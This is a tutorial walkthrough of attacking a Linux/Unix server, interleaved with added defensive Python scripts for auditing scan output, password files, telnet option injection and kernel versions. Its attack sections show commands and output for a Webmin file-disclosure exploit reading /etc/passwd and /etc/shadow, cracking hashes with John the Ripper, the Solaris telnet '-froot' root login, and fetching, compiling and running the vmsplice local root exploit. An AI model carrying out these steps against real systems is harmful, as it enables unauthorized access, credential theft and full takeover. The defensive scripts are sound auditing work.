The Art of the Unix / Linux Attack (Part Two)
This section opens with an article from Unixlegion discussing network vulnerabilities. It shows that, though some may consider The Art of the Unix and Linux Attack lesson outdated, most of its general principles still apply as technology advances.
Now that you have finished Grey-Box Attack – The Art of Microsoft Windows Attack, it is time to move on to the next part of this tutorial: The Art of the Unix / Linux Attack.
We cover the following material:
[0x02a] – Scanning and Enumeration
[0x02b] – Gaining Access
[0x02c] – Escalating Privilege
[0x02] – The Art of Unix / Linux Attack
[0x02a] – Linux Attack: Scanning & Enumeration
The first thing of importance before beginning a Unix / Linux attack is to gather as much information as possible.
Every piece of information collected can be used to guess passwords, locate the best points of attack, and derive other pertinent details.
Remember: no little bit of information is useless or a waste of time collecting. The smallest thing could end up becoming a huge clue further on down the line.
As was discussed in the first section, an attacker’s favorite tool is nmap; it is what attackers use to scan the target system. The reader should already grasp port scanning and how a single nmap command identifies the specific software listening on each port.
bt cwh # nmap -sV www.target.com

Starting Nmap 4.76 ( http://nmap.org )
Interesting ports on 192.168.0.111:
Not shown: 987 closed ports
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.6
22/tcp    open     ssh          OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp    open     smtp         Cisco PIX sanitized smtpd
53/tcp    open     domain       ISC BIND 9.4.2
80/tcp    open     http         Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp   filtered rpcbind
443/tcp   open     http         Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp   filtered rtsp
1720/tcp  filtered H.323/Q.931
2000/tcp  filtered callbook
3306/tcp  open     mysql        MySQL (unauthorized)
5060/tcp  filtered sip
10000/tcp open     http         Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall

Service detection performed. Please report any incorrect results at http://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
In the result, one can see that the system runs Webmin, but the exact version is unclear. Webmin 1.290 has a file disclosure vulnerability, and the exploit for it is available at http://milw0rm.com/exploits/2017.
Note: A vulnerability disclosure is the practice of reporting security weaknesses in computer hardware and software.
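The scan above is only useful once the attacker (or the defender auditing their own host) turns it into a list of services and notices which ones nmap named but could not version, such as "Webmin httpd". The following parser is an added example and is not part of the original article or of nmap; it reads nmap's normal-mode -sV output and reports open ports whose VERSION column carries no release number, which are exactly the services an administrator should fingerprint by hand before an attacker does. The sample output is a constructed, trimmed copy of the listing above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a trimmed copy of the nmap -sV output shown in the article.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 4.76 ( http://nmap.org )
Interesting ports on 192.168.0.111:
Not shown: 987 closed ports
PORT      STATE    SERVICE     VERSION
21/tcp    open     ftp         vsftpd 2.0.6
22/tcp    open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
111/tcp   filtered rpcbind
3306/tcp  open     mysql       MySQL (unauthorized)
10000/tcp open     http        Webmin httpd
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: Optional[str]  # None when nmap printed nothing in the VERSION column


def parse_nmap_sv(text: str) -> List[PortRecord]:
    """Parse the port table of normal-mode `nmap -sV` output into records."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            records.append(
                PortRecord(int(m["port"]), m["proto"], m["state"], m["service"], m["version"])
            )
    return records


def has_release_number(rec: PortRecord) -> bool:
    """True when nmap pinned a concrete release (any digit in the version text)."""
    return rec.version is not None and re.search(r"\d", rec.version) is not None


def find_unversioned_open(records: List[PortRecord]) -> List[PortRecord]:
    """Open ports where the product is named but its release is not, e.g. 'Webmin httpd'.
    These should be fingerprinted manually, because version-specific exploits will be tried
    against them regardless of what the scanner could see."""
    return [r for r in records if r.state == "open" and not has_release_number(r)]


if __name__ == "__main__":
    for r in find_unversioned_open(parse_nmap_sv(SAMPLE_NMAP_OUTPUT)):
        print(f"{r.port}/{r.proto} {r.service}: version unknown ({r.version!r})")
```

Filtered ports are deliberately excluded from the report: nmap cannot probe them, so an empty VERSION column there says nothing about the software behind them.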
bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:

One should note that the admin is outdated.
[0x02b] – Linux Attack: Gaining Access
As the target is a Linux server, it is more difficult to attack remotely than a Windows server.
Most remote exploits affecting Linux target third-party software, such as File Transfer Protocol (FTP), Secure Shell (SSH) and web servers. Attackers gain access to Linux servers by exploiting the third-party services that are running.
The most valuable information obtainable from a running third-party service is user information, usually found through web application vulnerabilities. Attackers then use brute-force techniques and social engineering to obtain valid user credentials. In this case, it is highly recommended to use the command below.
bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow
The purpose of this command is to read the /etc/shadow file.
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
The results are saved in the file shadow.txt, and the attacker then attempts to crack the system’s passwords with John the Ripper (dict.lst is the dictionary file).
bt cwh # john --wordlist=dict.lst shadow.txt

Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
user1            (user1)
guesses: 1  time: 0:00:00:00 100%  c/s: 150  trying: abc
This reveals that the password of user1 is “user1”; the root password was not found in the dictionary. The attacker can now log in to the target system with user1’s credentials. Once inside the system, they must find a way to increase their privileges.
An additional example is a telnet vulnerability in Solaris 10/11. It allows the attacker to log in with root privilege and little to no resistance: the attacker simply runs telnet “-froot” 192.168.0.112 against the telnet daemon on Solaris 10/11.
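Both the /etc/passwd and /etc/shadow listings above, and the one-second John run, point at the same administrative failures: interactive accounts protected by fast md5crypt ($1$) hashes, a user whose shell field is empty (so it defaults to /bin/sh), and an obviously weak password. The following audit script is an added example, not part of the original article; it parses the two files and reports the conditions a defender should fix before anyone runs a wordlist. The sample inputs are constructed excerpts of the listings above plus one hypothetical extra account ("backup") added to exercise the UID 0 and empty-password checks.

```python
from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpts modelled on the /etc/passwd and /etc/shadow shown in the article.
# The "backup" account is a hypothetical addition to exercise two more checks.
SAMPLE_PASSWD = """\
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
operator:x:11:0:operator:/root:/bin/bash
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:
backup:x:0:0:constructed extra uid-0 account:/root:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
operator:*:9797:0:::::
mysql:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
backup::14428:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

# crypt(3) hash prefixes. $1$ (md5crypt) and traditional DES are cheap enough that a
# dictionary run finishes in seconds, as the John output in the article shows.
HASH_KINDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
              "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
WEAK_HASH_KINDS = {"md5crypt", "descrypt"}


@dataclass
class Finding:
    user: str
    issue: str


def hash_kind(field: str) -> str:
    """Classify the password field of a shadow entry."""
    if field == "":
        return "empty"                      # no password at all
    if field.startswith(("*", "!")):
        return "locked"                     # password login disabled
    for prefix, name in HASH_KINDS.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"                   # traditional 13-character DES crypt
    return "unknown"


def parse_colon_file(text: str) -> Dict[str, List[str]]:
    """Map user name -> list of colon-separated fields, skipping blanks and comments."""
    rows = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows


def audit(passwd_text: str, shadow_text: str) -> List[Finding]:
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, pw in passwd.items():
        uid = int(pw[2])
        shell = pw[6] if len(pw) > 6 else ""
        interactive = shell not in NOLOGIN_SHELLS   # empty shell field means /bin/sh
        if uid == 0 and user != "root":
            findings.append(Finding(user, "UID 0 account other than root"))
        if user not in shadow:
            findings.append(Finding(user, "no /etc/shadow entry"))
            continue
        kind = hash_kind(shadow[user][1])
        if kind == "empty":
            findings.append(Finding(user, "empty password field"))
        elif interactive and kind in WEAK_HASH_KINDS:
            findings.append(Finding(user, f"{kind} hash on interactive account"))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f.user}: {f.issue}")
```

Locked system accounts ("*" or "!") are not reported even when they have a real shell, since no password can satisfy those fields; the interesting rows are the ones where a cheap hash guards a shell that actually logs in.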
bt cwh # telnet "-froot" 192.168.0.112

Using: 192.168.0.112
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc.   SunOS 5.10      Generic January 2007
# id
uid=0(root) gid=0(root)
#
By using this technique, there is no need to escalate privilege since the attacker is already logged in under root privilege.
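The Solaris telnet flaw above works because the login name a telnet client supplies travels to the server inside the Telnet NEW-ENVIRON option (RFC 1572) as the USER variable, and the vulnerable in.telnetd passed that value straight to login, so a value beginning with -f became login's "already authenticated" flag. A network sensor or a hardened telnet front end can catch this on the wire by decoding the option and refusing any USER value that starts with a dash. The decoder below is an added example, not code from the article or from any telnet implementation; the sample subnegotiations are constructed with the helper at the bottom.

```python
from typing import Dict, List

# Telnet command bytes (RFC 854) and NEW-ENVIRON option codes (RFC 1572).
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
IS, SEND, INFO = 0, 1, 2            # first byte of the subnegotiation payload
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def extract_new_environ(stream: bytes) -> List[bytes]:
    """Return the payload of every IAC SB NEW-ENVIRON ... IAC SE block in a raw telnet
    byte stream. An escaped data byte (IAC IAC) is collapsed to a single 0xFF."""
    payloads = []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] == IAC and i + 2 < n and stream[i + 1] == SB and stream[i + 2] == NEW_ENVIRON:
            i += 3
            buf = bytearray()
            while i < n:
                b = stream[i]
                if b != IAC:
                    buf.append(b)
                    i += 1
                    continue
                nxt = stream[i + 1] if i + 1 < n else None
                i += 2
                if nxt == IAC:
                    buf.append(IAC)         # escaped 0xFF inside the data
                    continue
                break                       # IAC SE closes the block; any other IAC is malformed and also ends it
            payloads.append(bytes(buf))
        else:
            i += 1
    return payloads


def parse_new_environ(payload: bytes) -> Dict[str, str]:
    """Decode an IS/INFO payload into {variable name: value}. A SEND payload (sent by the
    server to request variables) carries no values and yields an empty dict."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    env: Dict[str, str] = {}
    name = value = None
    cur = None                               # which buffer literal bytes go to
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):
            if name is not None:
                env[name.decode("latin-1")] = (value or b"").decode("latin-1")
            name, value, cur = bytearray(), None, "name"
        elif b == VALUE:
            value, cur = bytearray(), "value"
        elif b == ESC:                       # next byte is literal even if it is 0..3
            i += 1
            if i < len(payload) and cur is not None:
                (name if cur == "name" else value).append(payload[i])
        elif cur == "name":
            name.append(b)
        elif cur == "value":
            value.append(b)
        i += 1
    if name is not None:
        env[name.decode("latin-1")] = (value or b"").decode("latin-1")
    return env


def suspicious_user_values(stream: bytes) -> List[str]:
    """USER values in the stream that look like option injection (leading '-'),
    e.g. the "-froot" from the Solaris example."""
    hits = []
    for payload in extract_new_environ(stream):
        user = parse_new_environ(payload).get("USER")
        if user is not None and user.startswith("-"):
            hits.append(user)
    return hits


def build_client_environ(user: str) -> bytes:
    """Constructed client-to-server subnegotiation:
    IAC SB NEW-ENVIRON IS VAR "USER" VALUE <user> IAC SE"""
    return (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
            + bytes([VALUE]) + user.encode() + bytes([IAC, SE]))


if __name__ == "__main__":
    sample = build_client_environ("alice") + build_client_environ("-froot")
    print(suspicious_user_values(sample))
```

The check is deliberately on the decoded value rather than on a raw byte pattern: RFC 1572 lets a client hide bytes behind ESC and IAC escapes, so a substring match for "-f" on the wire would be easy to sidestep while the decoded USER still starts with a dash.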
[0x02c] – Escalating Privilege
This part of the article introduces a Linux attack that exploits a local root vulnerability in the Linux system. Useful exploits of this kind can be found at milw0rm.com. The first tasks after gaining access to a Linux system are to check the kernel version and the user ID.
user1@linuxserver:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
user1@linuxserver:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
These two commands tell the attacker which exploit can elevate their privilege to root. In this case, there is a local root exploit for Linux 2.6.17 – 2.6.24 on milw0rm.com. Once the exploit is downloaded, compiled and run, the session looks like the one shown below.
user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
--17:17:21--  http://milw0rm.com/exploits/5092
           => `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified

    [ >>> ]  7,197    11.58K/s

17:17:23 (11.58 KB/s) - `5092' saved [7197]

user1@linuxserver:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
user1@linuxserver:~$ ./5092
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
root@linuxserver:~# id
uid=0(root) gid=0(root) groups=1001(root)

At this point the attacker has, in effect, become root on the targeted server.
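The two reconnaissance commands in this section, uname -a and id, are the same ones an administrator should run across a fleet to find hosts that are a single local exploit away from root. The script below is an added example, not part of the article or of the exploit it discusses; it parses both outputs and flags kernels inside the 2.6.17 – 2.6.24 range the article gives for the vmsplice exploit. The inventory is constructed: the first host reproduces the article's values, the other two are hypothetical.

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]

# Affected kernels as stated in the article for the vmsplice local root exploit:
# Linux 2.6.17 through 2.6.24 inclusive.
VMSPLICE_AFFECTED: Tuple[Version, Version] = ((2, 6, 17), (2, 6, 24))

# Constructed inventory: hostname -> (`uname -a` output, `id` output).
# "linuxserver" reproduces the article's values; "web02" and "build01" are hypothetical.
SAMPLE_HOSTS: Dict[str, Tuple[str, str]] = {
    "linuxserver": (
        "Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux",
        "uid=1001(user1) gid=1001(user1) groups=1001(user1)",
    ),
    "web02": (
        "Linux web02 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux",
        "uid=0(root) gid=0(root) groups=0(root)",
    ),
    "build01": (
        "Linux build01 2.6.24-rc1 #1 SMP x86_64 GNU/Linux",
        "uid=1000(builder) gid=1000(builder)",
    ),
}


def parse_kernel_release(uname_output: str) -> Optional[Version]:
    """Pull the numeric release (major.minor.patch[.sub]) out of `uname -a` or `uname -r`
    text, dropping distribution suffixes such as -10-server or -rc1."""
    m = re.search(r"\b(\d+(?:\.\d+){2,3})", uname_output)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def parse_uid(id_output: str) -> Optional[int]:
    """Numeric uid from `id` output."""
    m = re.search(r"\buid=(\d+)", id_output)
    return int(m.group(1)) if m else None


def is_affected(version: Version, affected: Tuple[Version, Version] = VMSPLICE_AFFECTED) -> bool:
    """Inclusive range check on version tuples; a 4-part version such as (2, 6, 24, 2)
    compares greater than (2, 6, 24) and so falls outside the stated range."""
    low, high = affected
    return low <= version <= high


def assess_host(uname_output: str, id_output: str) -> dict:
    version = parse_kernel_release(uname_output)
    uid = parse_uid(id_output)
    return {
        "kernel": version,
        "vmsplice_affected": version is not None and is_affected(version),
        "uid": uid,
        "already_root": uid == 0,
    }


def hosts_needing_patch(hosts: Dict[str, Tuple[str, str]]) -> List[str]:
    """Hostnames whose kernel falls in the affected range: on these, any unprivileged
    local account is a root account in waiting."""
    return sorted(h for h, (u, i) in hosts.items() if assess_host(u, i)["vmsplice_affected"])


if __name__ == "__main__":
    for host in hosts_needing_patch(SAMPLE_HOSTS):
        print(host, assess_host(*SAMPLE_HOSTS[host]))
```

Version comparison is done on integer tuples rather than strings so that 2.6.9 sorts below 2.6.17 and 2.6.32 sorts above 2.6.24, which a lexical comparison would get wrong.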
When you are done studying this section, please continue to SQL Injection Cheat Sheet | Auto Pwn | Metasploit.